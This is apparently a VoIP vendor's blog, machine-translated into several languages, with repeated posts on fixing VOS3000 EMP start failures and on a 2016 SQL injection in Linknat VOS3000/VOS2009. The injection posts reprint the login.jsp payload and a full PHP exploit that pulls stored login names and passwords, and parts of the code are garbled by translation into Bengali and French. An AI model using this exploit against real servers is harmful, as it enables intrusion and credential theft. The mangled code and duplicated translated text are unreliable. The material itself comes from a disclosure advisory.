Skip to content
  • Home
  • Cheapest VOS3000 Server Rent, VOS3000 Best Trusted Vendor
  • VOS3000 Softswitch
Search
Close

VOS3000

MULTAHOST Blog for VOS3000 Troubleshoot

Tag: VOS3000 Server Support

multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

June 7, 2019January 14, 2026 king

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

नमस्ते सभी,

# सेवा empd शुर
ू कुन्शी एम्प सेवा शुरू: [FAILED]

आप में से कई चेहरा मुद्दा EMP शुरू EMP के लिए आदेश देने के बाद विफल रहा है, वहां कई कारण हैं, मैं अब एक प्रमुख मुद्दे का वर्णन करेंगे । VOS3000 Emp लिनक्स के सभी गिरी संस्करणों का समर्थन नहीं करते हैं। ज्यादातर VOS3000 के लिए उपयोग किया जाता है सेंटोस, सेंटोस 5.11 अब सेंटोस द्वारा समर्थित नहीं है, इसलिए इसे किसी भी डेटासेंटर से प्राप्त करना मुश्किल है लेकिन संभव है। उस मामले में रेपो फाइल को ठीक करने की जरूरत है। इसके अलावा सेंटोस 6.10 या सेंटोस 7 ने भी VOS3000 के कई संस्करणों का समर्थन नहीं किया। मुख्य रूप से गिरी मुद्दे के कारण शुरू नहीं किया गया। एम्प स्टार्ट के बिना आप एमबीएक्स शुरू नहीं कर सकते हैं। उस मामले में आप गिरी का समर्थन करने के लिए ढाल या एक समर्थित करने के लिए गिरी को अपग्रेड करने की जरूरत है । मैं संलग्न फ़ाइल में यहां emp समर्थित गिरी सूची साझा कर रहा हूं । तो आप आसानी से अपग्रेड और डाउनग्रेड कर सकते हैं।

अपग्रेड या डाउनग्रेड गिरी वर्जन के लिए आप गूगल में सर्च कर सकते हैं, इसके लिए कई आसान मैनुअल हैं।

एम्प समर्थित गिरी सूची

कुछ महत्वपूर्ण आदेश आप vos3000 के साथ गिरी मुद्दे के लिए पता करने की आवश्यकता है।

स्थापित सॉफ़्टवेयर को सूचीबद्ध करने के लिए आपको मानक आरपीएम कमांड का उपयोग करना होगा। शेल प्रॉम्प्ट पर निम्नलिखित कमांड टाइप करें:


$ rpm-qa kernel
Output: गिरी-2.6.18-4.1.15.el5 गिरी-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

यदि आपको अधिक मदद की जरूरत है तो सिर्फ मुझे व्हाट्सएप करें: +8801911119966

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

June 7, 2019 king

नमस्ते सभी,

# सेवा empd शुर
ू कुन्शी एम्प सेवा शुरू: [FAILED]

आप में से कई चेहरा मुद्दा EMP शुरू EMP के लिए आदेश देने के बाद विफल रहा है, वहां कई कारण हैं, मैं अब एक प्रमुख मुद्दे का वर्णन करेंगे । VOS3000 Emp लिनक्स के सभी गिरी संस्करणों का समर्थन नहीं करते हैं। ज्यादातर VOS3000 के लिए उपयोग किया जाता है सेंटोस, सेंटोस 5.11 अब सेंटोस द्वारा समर्थित नहीं है, इसलिए इसे किसी भी डेटासेंटर से प्राप्त करना मुश्किल है लेकिन संभव है। उस मामले में रेपो फाइल को ठीक करने की जरूरत है। इसके अलावा सेंटोस 6.10 या सेंटोस 7 ने भी VOS3000 के कई संस्करणों का समर्थन नहीं किया। मुख्य रूप से गिरी मुद्दे के कारण शुरू नहीं किया गया। एम्प स्टार्ट के बिना आप एमबीएक्स शुरू नहीं कर सकते हैं। उस मामले में आप गिरी का समर्थन करने के लिए ढाल या एक समर्थित करने के लिए गिरी को अपग्रेड करने की जरूरत है । मैं संलग्न फ़ाइल में यहां emp समर्थित गिरी सूची साझा कर रहा हूं । तो आप आसानी से अपग्रेड और डाउनग्रेड कर सकते हैं।

अपग्रेड या डाउनग्रेड गिरी वर्जन के लिए आप गूगल में सर्च कर सकते हैं, इसके लिए कई आसान मैनुअल हैं।

एम्प समर्थित गिरी सूची

कुछ महत्वपूर्ण आदेश आप vos3000 के साथ गिरी मुद्दे के लिए पता करने की आवश्यकता है।

स्थापित सॉफ़्टवेयर को सूचीबद्ध करने के लिए आपको मानक आरपीएम कमांड का उपयोग करना होगा। शेल प्रॉम्प्ट पर निम्नलिखित कमांड टाइप करें:


$ rpm-qa kernel
Output: गिरी-2.6.18-4.1.15.el5 गिरी-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

यदि आपको अधिक मदद की जरूरत है तो सिर्फ मुझे व्हाट्सएप करें: +8801911119966

EMP Start Failed in VOS3000 Server SSH, How to solve ?

June 7, 2019June 12, 2019 king

Hello All,

# service empd start
Starting kunshi emp service: [FAILED]

Many of you face issue EMP Start Failed after giving the command for EMP, There are many reason, I will Describe now one major issue. VOS3000 Emp do not support all kernel versions of Linux. Mostly used OS for VOS3000 is CentOS, Centos 5.11 is no more supported anymore by centos, so its difficult to get it from any datacenter but possible. Need to Fix Repo file in that case. Also Centos 6.10 or Centos 7 also not supported many versions of VOS3000. Mainly emp not start due to kernel issue. without emp start you can not start MBX. In that case you have to downgrade Kernel to supported kernel or need to upgrade kernel to supported one. I am sharing emp supported kernel list here in attached file. So you can upgrade and downgrade easily.

For Upgrade or downgrade Kernel version you can search in google, there are many easy manual for that.

emp supported kernel list

Some important commands you need to know for kernel issue with vos3000.

You need to use standard rpm command to list installed software. Type the following command at shell prompt:


$ rpm -qa kernel
Output: kernel-2.6.18-4.1.15.el5 kernel-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

If you need more help just whatsapp me: +8801911119966

multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

EMP শুরু VOS3000 সার্ভার SSH-এ ব্যর্থ হয়েছে, কিভাবে সমাধান করতে হবে?

June 7, 2019January 14, 2026 king

EMP শুরু VOS3000 সার্ভার SSH-এ ব্যর্থ হয়েছে, কিভাবে সমাধান করতে হবে?

হ্যালো অল,

# সার্ভিস empd শুরু
কুনশি ইএমপি সেবা শুরু হচ্ছে: [FAILED]

আপনারা অনেকেই ইএমপি-র জন্য আদেশ দেওয়ার পর ইএমপি স্টার্ট ব্যর্থ হয়েছেন, অনেক কারণ আছে, আমি এখন একটি প্রধান বিষয় বর্ণনা করব। VOS3000 Emp লিনাক্সের সকল কার্নেল সংস্করণ সমর্থন করে না। VOS3000 এর জন্য বেশিরভাগ ব্যবহৃত ওএস সেন্টওএস, সেন্টোস 5.11 আর সেন্টোস দ্বারা সমর্থিত নয়, তাই এটি যে কোন ডাটাসেন্টার থেকে পাওয়া কঠিন কিন্তু সম্ভব। সেক্ষেত্রে রেপো ফাইল ঠিক করতে হবে। এছাড়াও সেন্টোস 6.10 বা সেন্টোস 7 এছাড়াও VOS3000 এর অনেক সংস্করণ সমর্থন করেনি। প্রধানত কার্নেল সমস্যার কারণে ইএমপি শুরু হয় না। EMP শুরু ছাড়া আপনি MBX শুরু করতে পারবেন না। সেক্ষেত্রে আপনাকে কার্নেলকে সমর্থিত কার্নেলে নামিয়ে আনতে হবে অথবা সমর্থিত কার্নেল আপগ্রেড করতে হবে। আমি সংযুক্ত ফাইলে EMP সমর্থিত কার্নেল তালিকা এখানে শেয়ার করছি। যাতে আপনি সহজেই আপগ্রেড এবং ডাউনডাউন করতে পারেন।

কার্নেল সংস্করণ আপগ্রেড বা ডাউনগ্রেড করার জন্য আপনি Google এ অনুসন্ধান করতে পারেন, এর জন্য অনেক সহজ ম্যানুয়াল আছে.

EMP সমর্থিত কার্নেল তালিকা

কিছু গুরুত্বপূর্ণ কমান্ড আপনার জানা প্রয়োজন ভোস3000 সঙ্গে কার্নেল ইস্যু জন্য.

ইনস্টল করা সফটওয়্যারতালিকাভুক্ত করতে আপনাকে আদর্শ RPM কমান্ড ব্যবহার করতে হবে। শেল প্রম্পটে নিম্নলিখিত কমান্ড টাইপ করুন:


$ rpm -qa কার্নে
ল আউটপুট: kernel-2.6.18-4.1.15.el5 কার্নেল-2.6.18-8.1.1.el5 k ernel-2.6.18-8.1.10.el5

আপনার যদি আরো সাহায্যের প্রয়োজন হয় তাহলে আমাকে হোয়াটসঅ্যাপ করুন: +৮৮০১৯১১১১৯৯৬৬

  • VOS3000 IVR Codec Priority Advanced Voice Prompt Encoding Easy Configuration
  • VOS3000 IVR Custom Ringback Tone Dynamic CRBT Configuration Guide
  • VOS3000 IVR Callback Timing Important KEEP_LINE_RING_TIME Configuration
  • VOS3000 IVR Call State UDP Reporting Reliable Real-Time Notification
  • VOS3000 IVR Inband DTMF Detection Accurate Dual-Tone Recognition Setup
multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

Avvio EMP non riuscito in VOS3000 Server SSH, Come risolvere ?

June 7, 2019January 11, 2026 king

Ciao a tutti,

– avvio empd del servi
zio Avvio del servizio kunshi emp: [FAILED]

Molti di voi affrontare problema EMP Start non riuscito dopo aver dato il comando per EMP, Ci sono molte ragioni, Descriverò ora un problema importante. VOS3000 Emp non supporta tutte le versioni del kernel di Linux. Il sistema operativo più utilizzato per VOS3000 è CentOS, Centos 5.11 non è più supportato da centos, quindi è difficile ottenerlo da qualsiasi datacenter ma possibile. Necessità di correggere il file Repo in quel caso. Anche Centos 6.10 o Centos 7 non supportava molte versioni di VOS3000. Principalmente emp non si avvia a causa di un problema del kernel. senza emp start non è possibile avviare MBX. In tal caso è necessario eseguire il downgrade del kernel al kernel supportato o è necessario aggiornare il kernel a quello supportato. Sto condividendo emp lista del kernel supportato qui nel file allegato. Così è possibile aggiornare e declassare facilmente.

Per l’aggiornamento o il downgrade versione Kernel è possibile cercare in google, ci sono molti facile manuale per questo.

Elenco del kernel supportato da emp

Alcuni comandi importanti che è necessario conoscere per il problema del kernel con vos3000.

È necessario utilizzare il comando rpm standard per elencare il software installato. Digitare il seguente comando al prompt della shell:


-qa kernelOutpu
t: kernel-2.6.18-4.1.15.el5 kernel-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

Se avete bisogno di più aiuto solo whatsapp me: +880191111966


  • VOS3000 IVR Codec Priority Advanced Voice Prompt Encoding Easy Configuration
  • VOS3000 IVR Custom Ringback Tone Dynamic CRBT Configuration Guide
  • VOS3000 IVR Callback Timing Important KEEP_LINE_RING_TIME Configuration
  • VOS3000 IVR Call State UDP Reporting Reliable Real-Time Notification
  • VOS3000 IVR Inband DTMF Detection Accurate Dual-Tone Recognition Setup
multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

EMP Start VOS3000 Server SSH başarısız, nasıl çözmek için?

June 7, 2019January 15, 2026 king

EMP Start VOS3000 Server SSH başarısız, nasıl çözmek için?

Merhaba Tüm,

# hizmet empd başlangıç
Kunshi emp hizmetinin başlatılması: [FAILED]

Birçoğunuz EMP komutu verdikten sonra başarısız sorunu emp start yüz, Birçok nedeni vardır, şimdi önemli bir konu açıklayacağız. VOS3000 Emp, Linux’un tüm çekirdek sürümlerini desteklemez. Çoğunlukla VOS3000 için kullanılan işletim sistemi CentOS, Centos 5.11 artık centos tarafından desteklenen, bu yüzden herhangi bir veri merkezi ama mümkün onu almak zor. Bu durumda Repo dosyasını düzeltmem gerekiyor. Ayrıca Centos 6.10 veya Centos 7 de VOS3000 birçok sürümü desteklenmedi. Esas olarak emp çekirdek sorunu nedeniyle başlamaz. emp başlangıç olmadan MBX başlatamaz. Bu durumda desteklenen çekirdek için Çekirdek düşürmek zorunda veya desteklenen bir çekirdek yükseltmeniz gerekir. Ben ekli dosyada burada emp desteklenen çekirdek listesini paylaşıyorum. Böylece kolayca yükseltebilir ve düşürebilirsiniz.

Yükseltme veya google’da arayabilirsiniz Çekirdek sürümü düşürmek için, bunun için çok kolay bir kılavuz vardır.

emp desteklenen çekirdek listesi

Vos3000 ile çekirdek sorunu için bilmeniz gereken bazı önemli komutlar.

Yüklü yazılımı listelemek için standart rpm komutunu kullanmanız gerekir. Shell komut u komutuna aşağıdaki komutu yazın:


$ rpm -qa çekird
ekOutput: çekirdek-2.6.18-4.1.15.el5 çekirdek-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

Daha fazla yardıma ihtiyacınız varsa sadece whatsapp beni: +8801911119966


VOS3000 Softswitch VoIP – Guía Técnica Completa (Instalación, Servidor y Precio)


  • VOS3000 IVR Codec Priority Advanced Voice Prompt Encoding Easy Configuration
  • VOS3000 IVR Custom Ringback Tone Dynamic CRBT Configuration Guide
  • VOS3000 IVR Callback Timing Important KEEP_LINE_RING_TIME Configuration
  • VOS3000 IVR Call State UDP Reporting Reliable Real-Time Notification
  • VOS3000 IVR Inband DTMF Detection Accurate Dual-Tone Recognition Setup

কিভাবে VOS3000 SQL ইনজেকশন স্ক্রিপ্ট দ্বারা হ্যাক করা হয়, হ্যাকিং প্রতিরোধ!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL ইনজেকশন


থেকে: ওসামা খালিদ <osama ()="" codinghazard="" com="
">তারিখ: 19 মে, 2016 16:52:54 +0500</osama>


একটি এসকিউএল ইনজেকশন লিঙ্কনাট VOS3000/VOS2009, একটি জনপ্রিয় ভিওআইপি পাওয়া গেছে
সফটসুইচ, যা দূরবর্তী আক্রমণকারীদের অ্যাক্সেস পেতে অনুমতি দিতে পারে
সরল-পাঠে সংরক্ষিত প্রমাণপত্রাদি।

আবেদন: লিঙ্কনাট VOS3000/VOS2009
সংস্করণ প্রভাবিত: 2.1.1.5, 2.1.1.8, 2.1.2.0
বিক্রেতার ইউআরএল: http://www.linknat.com/
বাগ: SQLi (DBA সুবিধা সহ)
ধরন: দূরবর্তী
রেজোলিউশন: ফিক্সড, আপগ্রেড 2.1.2.4 অথবা 2.1.6.0 পরিষ্কার সংস্করণ
রেফারেন্স: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

এসকিউলি রিপোর্ট করেছে যে সময় ভিত্তিক অন্ধ। যেহেতু এটি একটি ইন-ব্যান্ড SQLI নয়,
ফলাফল স্বাগতম আউটপুট থেকে সংগ্রহ করা যেতে পারে.jsp একই সময়ে
সুসংবদ্ধ।

(১ম অনুরোধ)

পোস্ট http://target/eng/login.jsp
PARAM লগইনটাইপ=1
        name=' ইউনিয়ন নির্বাচন 1,2,@@version,'হ্যালো', 5,6#
        পাস=' অথবা '='

(একই অধিবেশনে ২য় অনুরোধ)

http://target/eng/welcome.jsp
ফলাফল 0|' ইউনিয়ন নির্বাচন
1,2,@@version,'হ্যালো', 5,6#|1|5.0.51a-সম্প্রদায়|হ্যালো|0.00|0.00|

<?php
#
# Linknat VOS2[ EXPLOIT CODE ]009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset($argv) ? [1]$argv : "loginname";
$column_[2]two   = i[2]sset($argv) ? $argv : "password";
$table    [3]    = isse[3]t($argv) ? $argv : "e_user";
$other        [4]= isset($[4]argv) ? $argv : "";

function banner() {
[5]    echo [5]"########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.php 127.0.0.1n";
  [HOST]  echo "php vos3000.php     n";
    echo "php vos3000.php 127.0.0.1 tab[HOST]l[COL1]e[COL2]_[TABLE]s[OTHER SQL]chema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        প্রতিটি ($key => $value হিসাবে $post
            $post আইটেম = $key। '=' . urlencode($value);
        $post স্ট্রিং = ইম[]্প্রোভাইজ করুন('&', $post_আইটেম);
        curl_setopt ($curl, CURLOPT_POST, ১);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post স্ট্রিং);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    $data প্রত্যাবর্তন;
}

ফাংশন কোয়েরি($host, $query) {
    $data = কার্ল ("http://$host/eng/login.jsp";, অ্যারে
            "loginType" => 1,
            "নাম" => "" ইউনিয়ন" । $query । "#",
            "পাস" => "" অথবা "="
        ), শূন্য, সত্য);
    preg_match_all('|' সেট-কুকি: (.*);|U', $data, $matches);
    $cookies = বিস্ফোরিত('; ', $matches);
    $data = কার্ল ("http://$host/eng/welcome.jsp";,[1] অ্যারে(), $cookies, মিথ্যা);
    $parts = বিস্ফোরণ("|", ছাঁটা($data);;

যদি (গণনা($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    $keys = [3]array_key[4]s(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = সর্বোচ্চ ($wid, স্ট্রলেন($v);
    }
    প্রতিটি ($k => $v [$k]হিসাবে $wid)[$k] {
        $fmt = "%-{$v}s";
        $sep = str_repeat('-',', $v);[$k]
    }
    $fmt = '| ' . বি[$k]স্ফোরিত(' | ', $fmt)। ' |';
    $sep = '+-'। ('-+-', $sep)। '-+';
    $buf = অ্যারে ($sep, vsprintf($fmt, $keys), $sep);
    $row হিসেবে $data) {
        $buf = vsprintf($fmt, $row);
        $buf = $sep;
    }
    রিটার্ন ই[]ম্প্রোভাইজ ("n", $buf);
}

ব্যানার();[]
"n";
প্রতিধ্বনি "টার্গেট: $hostn";
প্রতিধ্বনি "কলাম #1: $column_একn";
প্রতিধ্বনি "কলাম #2: $column_2n";
প্রতিধ্বনি "টেবিল: $tablen";
প্রতিধ্বনি "অন্যান্য: $othern";
"n";

$results = অ্যারে();
$count_ফলাফল = জিজ্ঞাসা ($host, "নির্বাচন করুন 1,2,Count(*), 4,5,6 থেকে $table
$other");
যদি ($count_ফলাফল) {
    $count = intval ($count_ফলাফল);
    প্রতিধ্বনি "খুঁজে $count সারি...n";

$i=0[0]; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=[0]" . hex2bin($result) .
" n";="" }="" else="" {="[1]" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" ==""[]> হেক্স২বিন($result), $column_টু
=> হেক্[0]স২বিন($result);।
    }

যদি (গণনা([1]$results) > 0) {
        প্রতিধ্বনি "nn"। ascii_table($results)। "n";
    }
} অন্যথায় {
    প্রতিধ্বনি "সারি গণনা পুনরুদ্ধারকরতে ত্রুটি";
}

?></$count;>

2016 থেকে যারা VOS3000 হ্যাক করার জন্য কিছু SQL ইনজেকশন নরম সামগ্রী ব্যবহার করে, আমাদের নিজস্ব নিরাপত্তা ব্যবস্থা আছে, আমরা এখন আমাদের নিরাপত্তা ব্যবস্থা খুব শক্তিশালী, আমার কাজের ফোকাস সবসময় ভিওআইপি সফট-সুইচের জন্য নিরাপত্তার জন্য ছিল। বেশিরভাগ সময় আমি বিনামূল্যে উপদেশ দিতাম অথবা যতটা সম্ভব বিনামূল্যে তথ্য শেয়ার করতাম। এখনো অনেক নোংরা জিনিস ঘুরে বেড়াচ্ছে, তাই দয়া করে সবসময় সাবধান থাকুন এবং আরো জানুন। অন্যথায় আপনি কখনোই ভাল ব্যবসা করতে পারবেন না। আজকাল যারা VOS3000 ক্লায়েন্ট সফটওয়্যারে লুকানো স্ক্রিপ্ট বা ম্যালওয়্যার ব্যবহার করে VOS সার্ভার হ্যাক করে.

আরও সাহায্যের জন্য আমাকে হোয়াটসঅ্যাপে নক করুন: +880191119966 – আমি সব উপায়ে সাহায্য করব।

COMMENT VOS3000 Get Hacked par SQL Injection Script, empêcher le piratage!

June 4, 2019November 22, 2020 king

Injection SQL Linknat VOS2009/VOS3000


De: Osama Khalid <osama ()="" codinghazard="" com="">D
ate: Thu, 19 mai 2016 16:52:54 +0500</osama>


Une injection SQL a été trouvée dans Linknat VOS3000/VOS2009, un VoIP populaire
softswitch, qui pourrait permettre aux attaquants distants d’accéder à la
informations d’identification stockées en texte brut.

Application: Linknat VOS3000/VOS2009
Versions concernées: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL du fournisseur : http://www.linknat.com/
Bug: SQLi (avec privilèges DBA)
Type: Télécommande
Résolution : Correction, mise à niveau vers 2.1.2.4 ou 2.1.6.0 Version propre
Référence: Wooyun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

Le SQLi signalé est aveugle basé sur le temps. Comme il ne s’agit pas d’un SQLi en bande, le
résultats peuvent être recueillis à partir de la sortie de bienvenue.jsp au cours de la même
Session.

(1ère demande)

POST http://target/eng/login.jsp
PARAM loginType=1
        name=' union select 1,2,@@version,'hello',5,6#
        pass=' OU ''='

(2ème demande au cours de la même session)

GET http://target/eng/welcome.jsp
RÉSULTAT 0|' sélection syndicale
1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00|

<?[ EXPLOIT CODE ]php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one [1]  = isset($argv) ? $argv : "l[2]oginname"[2];
$column_two   = isset($argv) ? $argv : "pas[3]sword";
$[3]table        = isset($argv) ? $argv : "e_us[4]er";
$oth[4]er        = isset($argv) ? $argv : "";

f[5]unction b[5]anner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.p[HOST]hp 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000[HOST].[COL1]p[COL2]h[TABLE]p[OTHER SQL] 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        avantach ( $post comme $key => $value)
            $post_items = $key . '=' . urlencode($value);
      []  $post_string = implose('',$post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    $data de retour;
}

requête de fonction($host, $query) {
    $data = curl(« http://$host/eng/login.jsp »;, tableau(
            « loginType » => 1,
            « nom » => « ' union « . $query . "#",
            « pass » => « ' OU ''=' »
        ), null, vrai);
    preg_match_all('| Set-Cookie: (.*);|U', $data, $matches);
    $cookies = implose( »; ' $matches);
    $data = curl(« http://$host/en[1]g/welcome.jsp »;, array(), $cookies, false);
    $parts = explode(« | », trim($data));

si (compte($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data[3]) {
    [4]$keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = max($wid, strlen($v));
    }
    foreach($[$k]wid comme $k[$k] => $v) {
        $fmt = « %-{$v}s »;
        $sep = str_repeat('-[$k]', $v);
    }
    $fmt = '|[$k] ' . imploser(' | ', $fmt) . ' |';
    $sep = '+-' . imploser('-+-', $sep) . '-+';
    $buf = tableau($sep, vsprintf($fmt, $keys), $sep);
    foreach($data comme $row) {
        $buf = vsprintf($fmt, $row);
        $buf = $[]sep;
    }
    retour implode(« n », []$buf);
}

bannière();
écho « n »;
écho « Cible: $hostn »;
écho « Colonne #1: $column_onen »;
écho « Colonne #2: $column_twon »;
écho « Table: $tablen »;
écho « Autre: $othern »;
écho « n »;

$results = tableau();
$count_result = query($host, « SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other »);
si ($count_result) {
    $count = intval($count_result);
    écho « Trouvé $count lignes...n [0]»;

pour ($i=0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column[0]_two="" .="" "=" . hex2bin($result) .
" n";="" }[1]="" else="" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($co[]lumn_one" ==""> hex2bin($result), $colum[0]n_two
=> hex2bin($result));
    }
[1]
si (compte($results) > 0) {
        écho « nn » . ascii_table($results) . « n »;
    }
} autre {
    écho « error retriving row count » ;
}

?></$count;>

À partir de 2016 Les gens utilisant quelques articles doux d’injection SQL pour pirater VOS3000, Nous avons notre propre système de sécurité à partir de ce moment, nous avons mis à jour notre système de sécurité trop fort maintenant, mon objectif de travail a toujours été pour la sécurité pour voip soft-switch. La plupart du temps, j’ai donné des conseils gratuits ou partagé des informations autant possible gratuitement. Pourtant, il ya beaucoup de choses sales courir autour, donc s’il vous plaît être prudent toujours et en savoir plus. Sinon, vous ne serez jamais en mesure de faire de bonnes affaires jamais. Maintenant-un-jours Personnes utilisant des scripts cachés ou des logiciels malveillants dans le logiciel client VOS3000 pour pirater VOS Server.

Pour plus d’aide Frappez-moi dans WhatsApp: +8801911119966 – je vais faire aider tous les moyens.

كيف VOS3000 الحصول على اختراق من قبل SQL حقن البرنامج النصي، ومنع القرصنة!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 حقن SQL


من: أسامة خالد <osama ()="" codinghazard="" com="">التاري
خ: الخميس, 19 مايو 2016 16:52:54 +0500</osama>


تم العثور على حقنة SQL في لينكنات VOS3000/VOS2009، وهو VoIP شعبية
softswitch، التي يمكن أن تسمح للمهاجمين عن بعد للوصول إلى
بيانات الاعتماد المخزنة في نص عادي.

التطبيق: لينكنات VOS3000/VOS2009
الإصدارات المتأثرة: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL البائع: http://www.linknat.com/
خطأ: SQLi (مع امتيازات DBA)
النوع: عن بعد
القرار: ثابت، الترقية إلى 2.1.2.4 أو 2.1.6.0 النسخة النظيفة
المرجع: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi ذكرت هي عمياء القائمة على الزمن. نظرا لأنه ليس في النطاق SQLi ، و
ويمكن جمع النتائج من الناتج من الترحيب .jsp خلال نفس
الدوره.

(الطلب الأول)

http://target/eng/login.jsp
تسجيل الدخول PARAMاًايناًالم
        name=' حدد الاتحاد 1,2,@@version,'مرحبا',5,6#
        تمرير =' أو ''='

(الطلب الثاني خلال الدورة نفسها)

الحصول على http://target/eng/welcome.jsp
اختيار 0|'الاتحاد
1,2,@@version,'مرحباً',5,6#|1|5.0.51a-المجتمع|مرحباً|0.00|0.00|||

<?php
#
#[ EXPLOIT CODE ] Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   [1]= isset($argv) ? $argv : "log[2]inname";
[2]$column_two   = isset($argv) ? $argv : "pass[3]word";
$t[3]able        = isset($argv) ? $argv : "e_us[4]er";
$othe[4]r        = isset($argv) ? $argv : "";

f[5]unction b[5]anner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos30[HOST]00.php 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vo[HOST]s[COL1]3[COL2]0[TABLE]0[OTHER SQL]0.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
